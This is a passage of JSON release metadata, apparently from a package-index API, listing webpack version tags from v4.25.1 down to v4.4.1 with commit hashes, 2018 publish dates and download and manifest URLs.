/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1